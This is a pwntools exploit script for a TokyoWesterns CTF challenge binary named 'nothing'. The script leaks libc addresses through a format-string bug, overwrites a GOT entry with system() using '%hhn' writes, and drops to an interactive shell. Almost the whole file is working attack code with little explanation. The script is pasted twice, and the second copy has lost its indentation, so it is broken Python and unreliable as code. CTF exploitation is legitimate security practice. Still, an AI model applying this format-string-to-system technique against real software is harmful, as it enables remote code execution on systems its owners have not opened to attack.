CreateRemoteThread/twctf-nothing.py

## twctf-nothing.py
#!/usr/bin/env python3

import sys
import pwn
import struct
import binascii

# nc pwn02.chal.ctf.westerns.tokyo 18247

if(len(sys.argv) > 1):
  p = pwn.remote("pwn02.chal.ctf.westerns.tokyo",18247)
else:
  p = pwn.process("./nothing")
  input("Process PID is %d, connect now or hit enter..." % p.pid)
p.recvuntil("> ")

def leakPointer(addr):
  global p
  out = b""
  out += b"%7$s\x00\x00\x00\x00"
  out += pwn.p64(addr)
  out += b"\n"
  p.send(out)
  x = p.recvuntil("> ")[:-2]
  f = b"\x00" * (8 - len(x))
  ptr_printf = struct.unpack("<q",x + f)
  print("%x" % ptr_printf[0])
  return ptr_printf

def sendFmtString(strin):
  global p
  p.send(strin)
  x = p.recvuntil("> ",timeout=0.5)[:-2]
  print(x)

# steps:
# leak libc
# can't one_gadget to victory
# one-shot printf to system.

got_read = leakPointer(0x601030)
got_setbuf = leakPointer(0x601020)

print("read is at %x" % got_read)
print("setbuf is at %x" % got_setbuf)

# printf is 0000000000064f00

libc_base = got_read[0] - 0x110180
libc_printf = libc_base + 0x64f00
libc_system = libc_base + 0x04ef50
# libc_magic = libc_base + 0x10a45
libc_magic = libc_base + 0x4ef50
print("libc_base is at %x" % libc_base)
print("libc_magic is at %x" % libc_magic)
print("libc_system is at %x" % libc_system)

# e0 in system makes it too hard to write...

firstByte = libc_magic & 0xFF
secondByte = (libc_magic & 0xFF00) >> 8
thirdByte = (libc_magic & 0xFF0000) >> 16

print("firstbyte: %02x" % firstByte)
print("second   : %02x" % secondByte)
print("third    : %02x" % thirdByte)

a = [firstByte,secondByte,thirdByte]
bx = [firstByte,secondByte,thirdByte]
if max(a) > 0xd0:
  print("Fuckit, giving up")
  sys.exit(0)

a.sort()

firstNum = a.pop(0)
out = b"A" * firstNum + b'%33$hhn'
secondNum = a.pop(0)
out += b"A" * (secondNum - firstNum) + b'%34$hhn'
thirdNum = a.pop(0)
out += b"A" * (thirdNum - secondNum) + b'%35$hhn'

# padding, otherwise this is fine.
out += b"\x00" * (0xd8 - len(out) )
out += pwn.p64(0x601028 + bx.index(firstNum))
out += pwn.p64(0x601028 + bx.index(secondNum))
out += pwn.p64(0x601028 + bx.index(thirdNum))
out += b"\n"

print(len(out))

print(out)
input("...")
sendFmtString(out)
p.interactive()

def overwriteAddress(addr,val,testMode = True,offsetAdjust = 0,extraPadding = 0):
  global p
  print("Attempting to overwrite exit, last byte with '%02x'" % val)
  out = b""
  ctr_out = 8 + (val / 8) + offsetAdjust
  out += b"a" * val
  if testMode is True:
    out_added = b"%" + b"%d" % (ctr_out) + b"$x"
  else:
    out_added = b"%" + b"%d" % (ctr_out) + b"$hhn"
  out_added += b"\x00" * (8 - len(out_added))
  out += out_added
  print(len(out))
  out += b'\x00' * (val % 8)
  out += b'\x00' * extraPadding
  out += pwn.p64(addr)
  if len(out) > 0x100:
    print("Rejecting: len(out) = %d" % len(out))
  else:
    sendFmtString(out)

# firstbyte = (libc_base + 0x10a45c) & 0xFF
# secondbyte = ((libc_base + 0x10a45c) & 0xFF00) >> 8
# -lastbyte = ((libc_base + 0x10a45c) & 0xFF0000) >> 16

# overwriteAddress(0x601038,firstbyte)
# overwriteAddress(0x601039,secondbyte)
# overwriteAddress(0x601040,lastbyte)

# while True:
#   cmd = input("cmd >").rstrip()
#   tokens = cmd.split(" ")
#   if tokens[0] == "r":
#     print("Giving you control")
#     p.interactive()
#   elif tokens[0] == "t" and len(tokens) == 5:
#     addr = int(tokens[1],16)
#     val = int(tokens[2],16)
#     offset = int(tokens[3])
#     padding = int(tokens[4])
#     print("Testing with address %x,value %x,offset %d,padding %d" % (addr,val,offset,padding))
#     overwriteAddress(addr,val,testMode=True,offsetAdjust = offset,extraPadding = padding)
#   elif tokens[0] == "w" and len(tokens) == 5:
#     addr = int(tokens[1],16)
#     val = int(tokens[2],16)
#     offset = int(tokens[3])
#     padding = int(tokens[4])
#     print("Testing with address %x,value %x,offset %d,padding %d" % (addr,val,offset,padding))
#     overwriteAddress(addr,val,testMode=False,offsetAdjust = offset,extraPadding = padding)
	#!/usr/bin/env python3

	import sys
	import pwn
	import struct
	import binascii

	# nc pwn02.chal.ctf.westerns.tokyo 18247

	if(len(sys.argv) > 1):
	p = pwn.remote("pwn02.chal.ctf.westerns.tokyo",18247)
	else:
	p = pwn.process("./nothing")
	input("Process PID is %d, connect now or hit enter..." % p.pid)
	p.recvuntil("> ")

	def leakPointer(addr):
	global p
	out = b""
	out += b"%7$s\x00\x00\x00\x00"
	out += pwn.p64(addr)
	out += b"\n"
	p.send(out)
	x = p.recvuntil("> ")[:-2]
	f = b"\x00" * (8 - len(x))
	ptr_printf = struct.unpack("<q",x + f)
	print("%x" % ptr_printf[0])
	return ptr_printf

	def sendFmtString(strin):
	global p
	p.send(strin)
	x = p.recvuntil("> ",timeout=0.5)[:-2]
	print(x)

	# steps:
	# leak libc
	# can't one_gadget to victory
	# one-shot printf to system.

	got_read = leakPointer(0x601030)
	got_setbuf = leakPointer(0x601020)

	print("read is at %x" % got_read)
	print("setbuf is at %x" % got_setbuf)

	# printf is 0000000000064f00

	libc_base = got_read[0] - 0x110180
	libc_printf = libc_base + 0x64f00
	libc_system = libc_base + 0x04ef50
	# libc_magic = libc_base + 0x10a45
	libc_magic = libc_base + 0x4ef50
	print("libc_base is at %x" % libc_base)
	print("libc_magic is at %x" % libc_magic)
	print("libc_system is at %x" % libc_system)

	# e0 in system makes it too hard to write...

	firstByte = libc_magic & 0xFF
	secondByte = (libc_magic & 0xFF00) >> 8
	thirdByte = (libc_magic & 0xFF0000) >> 16

	print("firstbyte: %02x" % firstByte)
	print("second : %02x" % secondByte)
	print("third : %02x" % thirdByte)

	a = [firstByte,secondByte,thirdByte]
	bx = [firstByte,secondByte,thirdByte]
	if max(a) > 0xd0:
	print("Fuckit, giving up")
	sys.exit(0)

	a.sort()

	firstNum = a.pop(0)
	out = b"A" * firstNum + b'%33$hhn'
	secondNum = a.pop(0)
	out += b"A" * (secondNum - firstNum) + b'%34$hhn'
	thirdNum = a.pop(0)
	out += b"A" * (thirdNum - secondNum) + b'%35$hhn'

	# padding, otherwise this is fine.
	out += b"\x00" * (0xd8 - len(out) )
	out += pwn.p64(0x601028 + bx.index(firstNum))
	out += pwn.p64(0x601028 + bx.index(secondNum))
	out += pwn.p64(0x601028 + bx.index(thirdNum))
	out += b"\n"

	print(len(out))

	print(out)
	input("...")
	sendFmtString(out)
	p.interactive()

	def overwriteAddress(addr,val,testMode = True,offsetAdjust = 0,extraPadding = 0):
	global p
	print("Attempting to overwrite exit, last byte with '%02x'" % val)
	out = b""
	ctr_out = 8 + (val / 8) + offsetAdjust
	out += b"a" * val
	if testMode is True:
	out_added = b"%" + b"%d" % (ctr_out) + b"$x"
	else:
	out_added = b"%" + b"%d" % (ctr_out) + b"$hhn"
	out_added += b"\x00" * (8 - len(out_added))
	out += out_added
	print(len(out))
	out += b'\x00' * (val % 8)
	out += b'\x00' * extraPadding
	out += pwn.p64(addr)
	if len(out) > 0x100:
	print("Rejecting: len(out) = %d" % len(out))
	else:
	sendFmtString(out)

	# firstbyte = (libc_base + 0x10a45c) & 0xFF
	# secondbyte = ((libc_base + 0x10a45c) & 0xFF00) >> 8
	# -lastbyte = ((libc_base + 0x10a45c) & 0xFF0000) >> 16

	# overwriteAddress(0x601038,firstbyte)
	# overwriteAddress(0x601039,secondbyte)
	# overwriteAddress(0x601040,lastbyte)

	# while True:
	# cmd = input("cmd >").rstrip()
	# tokens = cmd.split(" ")
	# if tokens[0] == "r":
	# print("Giving you control")
	# p.interactive()
	# elif tokens[0] == "t" and len(tokens) == 5:
	# addr = int(tokens[1],16)
	# val = int(tokens[2],16)
	# offset = int(tokens[3])
	# padding = int(tokens[4])
	# print("Testing with address %x,value %x,offset %d,padding %d" % (addr,val,offset,padding))
	# overwriteAddress(addr,val,testMode=True,offsetAdjust = offset,extraPadding = padding)
	# elif tokens[0] == "w" and len(tokens) == 5:
	# addr = int(tokens[1],16)
	# val = int(tokens[2],16)
	# offset = int(tokens[3])
	# padding = int(tokens[4])
	# print("Testing with address %x,value %x,offset %d,padding %d" % (addr,val,offset,padding))
	# overwriteAddress(addr,val,testMode=False,offsetAdjust = offset,extraPadding = padding)